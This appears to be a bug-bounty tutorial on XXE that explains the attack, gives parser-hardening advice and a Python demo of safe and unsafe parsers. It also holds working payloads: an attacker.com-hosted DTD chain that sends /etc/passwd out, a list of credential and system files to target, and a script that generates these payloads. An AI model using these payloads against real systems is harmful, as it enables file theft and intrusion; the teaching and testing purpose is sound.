XXE | Bug Bounty

What is XXE

XXE stands for XML External Entity. It is an attack on the XML parser rather than on the application logic: a DOCTYPE in attacker-supplied input declares an entity whose value is fetched from a URI (a SYSTEM identifier), and a parser that honours the declaration reads that URI when the entity is referenced. Depending on the parser and the URI schemes it supports, this lets an attacker read local files, send their contents to a server they control, reach internal hosts from the server's network position and, in a few configurations (PHP with the expect:// wrapper), run commands.

XXE is particularly dangerous because the file read or the request is made by the server process itself, with its privileges and its network position. Whatever authentication and authorization the application enforces on its own features does not apply: the attacker only needs to reach an endpoint that feeds their XML to the parser, and can then read files that no legitimate user could fetch through the application.

To exploit XXE, an attacker sends an XML document whose DOCTYPE declares an external entity, for example <!ENTITY xxe SYSTEM "file:///etc/passwd">, and references it as &xxe; in an element whose value the application later uses or echoes. If the parser has not been configured to refuse external entities (the weakness lies in the parser configuration, not in the declaration, which is legal XML), it resolves the URI, substitutes the content for the reference, and the application processes the result as if the user had typed it.

The most reliable protection is to disable DTD processing in the XML parser altogether; untrusted input almost never needs a DTD, and refusing it also stops entity-expansion denial of service ("billion laughs"). Where a DTD must be accepted, disable external general entities, external parameter entities and external DTD loading individually. Keeping the parser library patched matters, but patching alone does not fix XXE: in most libraries external entity resolution is a documented feature, and it is on by default in several (Java's JAXP parsers, libxml2 before 2.9.0), so the safe setting has to be chosen explicitly.
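The mechanism and the fix side by side, as an added example written for this page (it is not code from the original post). It uses only the Python standard library's SAX parser, writes a throwaway "secret" file it constructs itself, and parses the same XXE document three ways: with external entities resolved (the vulnerable setting), with the library default (the entity is silently left empty), and with a hardened configuration that refuses any DOCTYPE.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import feature_external_ges, property_lexical_handler

# Added example, not code from the page. The secret file and its content
# ("db_password=hunter2") are constructed here for the demonstration.


class _TextCollector(xml.sax.ContentHandler):
    """Gathers character data so we can see what the parser substituted."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


class DoctypeRejected(ValueError):
    """Raised by the hardened configuration when untrusted input carries a DTD."""


class _RejectDoctype:
    """Lexical handler that aborts on the first DOCTYPE. Refusing DTDs outright
    also removes parameter-entity tricks and entity-expansion DoS, which a
    'no external entities' switch alone does not cover."""

    def startDTD(self, name, public_id, system_id):
        raise DoctypeRejected("DOCTYPE %r not allowed in untrusted XML" % name)

    def endDTD(self):
        pass

    def comment(self, content):
        pass

    def startCDATA(self):
        pass

    def endCDATA(self):
        pass


def parse_text(xml_bytes, *, resolve_external_entities=False, allow_doctype=True):
    """Parse and return the text content of the document.
    resolve_external_entities=True is the vulnerable configuration;
    allow_doctype=False is the hardened one."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    if not allow_doctype:
        parser.setProperty(property_lexical_handler, _RejectDoctype())
    collector = _TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.parts)


def xxe_document(path):
    """Classic in-band payload: declare an external entity pointing at a local
    file and reference it in a field the application echoes back."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE data [ <!ENTITY xxe SYSTEM "file://{path}"> ]>\n'
        "<data>&xxe;</data>\n"
    ).encode()


def demo():
    """Write a throwaway secret, then show leak / silent skip / rejection."""
    with tempfile.NamedTemporaryFile("w", suffix=".conf", delete=False) as fh:
        fh.write("db_password=hunter2")  # constructed secret, not a real credential
        secret_path = fh.name
    try:
        doc = xxe_document(secret_path)
        leaked = parse_text(doc, resolve_external_entities=True)
        skipped = parse_text(doc)  # Python >= 3.7.1 default: entity left empty
        try:
            parse_text(doc, allow_doctype=False)
            rejected = False
        except DoctypeRejected:
            rejected = True
    finally:
        os.unlink(secret_path)
    return leaked, skipped, rejected


if __name__ == "__main__":
    leaked, skipped, rejected = demo()
    print("vulnerable parser returned:", leaked)
    print("default parser returned:", repr(skipped))
    print("hardened parser rejected the DOCTYPE:", rejected)
```

The second configuration is what Python ships today, and it shows why "keep the parser up to date" is only half an answer: the feature is still there, one setFeature call away, and in other languages the default is the other way round. The third configuration is the one to copy into code that receives XML from outside.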

How and where to find XXE

XXE vulnerabilities can be found in any application that parses XML from the outside. Common places to look are SOAP and other XML web services, SAML single sign-on endpoints, RSS and Atom feed importers, file uploads that are XML underneath (SVG, DOCX, XLSX, PPTX) and JSON APIs that quietly also accept Content-Type: application/xml. Mobile applications are worth checking because their back-end APIs are often XML-based, and the parser on the server is what matters.

To find XXE vulnerabilities, an attacker can use an automated scanner such as Burp Suite, which injects entity declarations into XML inputs and watches for out-of-band callbacks. Manual testing is more reliable: first confirm that a harmless internal entity is reflected (<!ENTITY test "xxe">, referenced as &test;), then try an external entity for a local file and, if nothing comes back in the response, an external DTD hosted on a listener you control, so that a blind parse still produces a DNS or HTTP hit.

Validating the XML against a schema is not a defence: DTD processing and entity resolution happen before, and independently of, schema validation, so a document can be perfectly valid and still carry a working XXE. Input validation on the surrounding request does not help either, because the malicious part is ordinary well-formed XML. The fix belongs in the parser configuration described above; validation and input filtering are useful against other bugs, not this one.

Type of XXE

XXE attacks are usually grouped by how the attacker gets the data back, not by what is read:

1. In-band (classic) file disclosure: the entity expands to a local file and the contents come back in the application's response, in a field it echoes or in an error message.

2. Blind (out-of-band) exfiltration: the response never shows the entity value, so the attacker hosts an external DTD and has the parser send the data to a server they control. This is often mislabelled "remote file inclusion"; the remote file is a DTD that the parser evaluates, and it does not give code execution by itself. Code execution needs a parser-specific scheme such as PHP's expect:// wrapper.

3. Server Side Request Forgery: the entity's SYSTEM identifier points at an internal URL (a cloud metadata endpoint, an admin interface on localhost) and the parser makes the request from the server's network position.

XXE Payloads

The fragments below are all pieces of one technique, blind (out-of-band) exfiltration through an attacker-hosted DTD, and none of them works on its own. They cannot simply be pasted into the request's DOCTYPE either: a parameter-entity reference such as %file; inside a markup declaration is forbidden in the internal subset (the "PEs in Internal Subset" well-formedness constraint), which is exactly why the chain needs an external DTD. Only the entity that loads that DTD goes in the request:

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
  %dtd;
]>
<foo>bar</foo>

Everything else lives in evil.dtd on attacker.com, where the parser fetches and evaluates it:

1. <!ENTITY % file SYSTEM "file:///etc/passwd">
2. <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/exfil.php?data=%file;'>">
3. %eval;
4. %exfil;

Entry 1 reads the target. In entry 2, &#x25; is a character reference for %, so the inner text only becomes a parameter-entity declaration when %eval; is expanded, while %file; is expanded immediately (that is allowed in an external DTD) and the file content lands inside the URL. Entry 4 then makes the parser request that URL, and the content shows up in the web server log on attacker.com.

The CDATA wrapper entities are a different, in-band trick and do not belong inside an exfiltration URL:

5. <!ENTITY % start "<![CDATA[">
6. <!ENTITY % end "]]>">
7. <!ENTITY all "%start;%file;%end;">

With these in the external DTD, &all; referenced in the request body expands to the file wrapped in a CDATA section, so < and & in the file do not break the document, and the whole file comes back in the response wherever the application echoes that element.

Targets to substitute into entry 1, with the caveat that goes with each group:

8. file:///etc/passwd, file:///etc/group, file:///etc/hosts, file:///etc/resolv.conf, file:///etc/fstab, file:///etc/crontab, file:///etc/profile, file:///etc/sysctl.conf, file:///etc/ssh/ssh_config: world-readable recon files. All are multi-line, so they come back in-band but generally not through a plain HTTP URL (a newline is not legal in a URI, so the parser rejects or mangles the request). Use FTP or error-based exfiltration for those, or start with file:///etc/hostname, which is a single line.

9. file:///etc/shadow, file:///etc/shadow-, file:///etc/sudoers: readable only if the parser runs as root, which is itself a finding when it works.

10. file:///proc/self/environ: the environment of the process doing the parsing, a common home for database and cloud credentials. The variables are NUL-separated and NUL is not a legal XML character, so on PHP this usually needs a wrapper such as php://filter/convert.base64-encode/resource=/proc/self/environ.

11. file:///proc/self/status, file:///proc/cpuinfo, file:///proc/mounts, file:///proc/loadavg: process uid, CPU, mounted volumes (container and secret mounts show up here) and load. Recon, not secrets.

12. file:///dev/random and file:///dev/urandom: these never return end-of-file, so the parser blocks reading them. They are a denial-of-service payload, not something to exfiltrate.
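The chain above assembled in code, together with the check a tester wants before choosing a target: whether a file's content can survive the trip through an HTTP URL at all. This is an added example written for this page, not code from the original post; attacker.com and exfil.php are the placeholder names the list uses, and the sample file contents are constructed.

```python
import re

# Added example, not code from the page. attacker.com / exfil.php are the
# placeholders from the payload list; sample contents below are constructed.


def trigger_document(dtd_url):
    """The request body. Only the external DTD load may sit in the internal
    subset; %file; inside a declaration here would be a well-formedness error."""
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE foo [\n"
        '  <!ENTITY % dtd SYSTEM "' + dtd_url + '">\n'
        "  %dtd;\n"
        "]>\n"
        "<foo>bar</foo>\n"
    )


def oob_dtd(target_uri, callback_url):
    """Contents of evil.dtd for blind exfiltration. &#x25; is a character
    reference for '%', so the inner declaration becomes a parameter entity only
    when %eval; is expanded; %file; is expanded at once, which an external DTD
    permits, placing the file content inside the callback URL."""
    return (
        '<!ENTITY % file SYSTEM "' + target_uri + '">\n'
        '<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM \'' + callback_url + "?data=%file;'>\">\n"
        "%eval;\n"
        "%exfil;\n"
    )


def inband_cdata_dtd(target_uri):
    """In-band alternative: wrap the file in CDATA so '<' and '&' in it do not
    break the document; the request body then references &all;."""
    return (
        '<!ENTITY % file SYSTEM "' + target_uri + '">\n'
        '<!ENTITY % start "<![CDATA[">\n'
        '<!ENTITY % end "]]>">\n'
        '<!ENTITY all "%start;%file;%end;">\n'
    )


# RFC 3986 unreserved + reserved characters; anything else is not legal in a URI.
_URI_CHARS = re.compile(r"^[A-Za-z0-9\-._~:/?#\[\]@!$&'()*+,;=%]*$")


def http_exfil_blockers(file_content):
    """Reasons why file_content cannot be carried inside the SYSTEM literal of
    the exfil entity. An empty list means plain HTTP exfiltration can work."""
    reasons = []
    if "\n" in file_content or "\r" in file_content:
        reasons.append("newline: the SYSTEM literal is no longer a valid URI")
    if "'" in file_content or '"' in file_content:
        reasons.append("quote: closes the SYSTEM literal early")
    if "%" in file_content or "&" in file_content:
        reasons.append("% or &: read as an entity reference while %file; is expanded")
    if "#" in file_content:
        reasons.append("#: starts a URI fragment; libxml2 refuses it, others drop the rest")
    if not _URI_CHARS.match(file_content):
        reasons.append("character not allowed in a URI (space, control, non-ASCII)")
    return reasons


def expected_callback(callback_url, file_content):
    """What the listener's access log should show on success, or None when the
    content cannot travel in a URL and needs FTP or error-based exfiltration."""
    if http_exfil_blockers(file_content):
        return None
    return callback_url + "?data=" + file_content


if __name__ == "__main__":
    # Constructed samples: a one-line hostname and two lines of a passwd file.
    hostname = "web-01"
    passwd = "root:x:0:0:root:/root:/bin/bash\nbin:x:1:1::/bin:/sbin/nologin"
    print(trigger_document("http://attacker.com/evil.dtd"))
    print(oob_dtd("file:///etc/hostname", "http://attacker.com/exfil.php"))
    print("hostname ->", expected_callback("http://attacker.com/exfil.php", hostname))
    print("passwd   ->", http_exfil_blockers(passwd))
```

Running it shows why /etc/hostname is the right first target for the HTTP chain and /etc/passwd is not: the hostname produces a clean callback URL, while the passwd sample is blocked by its newlines. The in-band CDATA DTD has no such limit, which is why it is preferred whenever the application echoes the element at all.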
